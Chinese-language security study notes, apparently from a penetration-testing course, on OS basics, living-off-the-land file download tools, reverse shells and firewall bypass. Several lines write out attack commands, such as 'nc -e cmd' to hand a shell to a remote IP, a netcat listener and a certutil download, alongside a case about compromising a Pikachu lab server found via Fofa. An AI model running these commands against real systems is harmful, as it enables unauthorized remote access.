操作系统_名词_文件下载_反弹SHELL_防火墙绕过

操作系统

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

2、windows&Linux常见命令

3、文件权限&服务权限&用户权限

4、系统用户&用户组&服务用户等分类

5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java等

Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)

useradd passwd

测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器

1、内网:

内网->用户

nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙

服务器主机<->另一个服务器主机

如果开了防火墙,是不行的

入站严格出站宽松

nc -e cmd ip地址 端口(就是正向链接)

主动把权限给出去

反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器

文件下载&反弹shell:

certuil -urlcache -split -f ip地址

nc -e cmd ip地址

找个在线的靶场

相关推荐
ZC跨境爬虫5 分钟前
跟着 MDN 学CSS day_49:定位实例练习从入门到精通
前端·css·学习
三品吉他手会点灯10 分钟前
C语言学习笔记 - 45.运算符和表达式 - 运算符3 - 逻辑运算符
c语言·笔记·学习
数智工坊33 分钟前
周志华《Machine Learning》学习笔记--第七章--贝叶斯分类器
人工智能·笔记·神经网络·学习·机器学习
MartinYeung534 分钟前
[论文学习]使用全同态加密实现实用隐私保护机器学习训练
人工智能·学习
网络与设备以及操作系统学习使用者1 小时前
多路由设备静态路由配置详解
运维·网络·学习·华为·智能路由器
坏柠2 小时前
从一个设备控制面板开始,系统学习 LVGL 界面开发
android·javascript·学习
创业之路&下一个五年2 小时前
委托、事件、发布-订阅模式全梳理(完整总结)
学习·总结
MartinYeung52 小时前
[论文学习] 全同态加密下的加密文字比较与子字串搜寻演算法延伸研究
学习·区块链·同态加密
Front思2 小时前
如何学习Shopify前端开发?
前端·学习
再玩一会儿看代码2 小时前
Java浅拷贝和深拷贝理解笔记
java·linux·开发语言·笔记·python·学习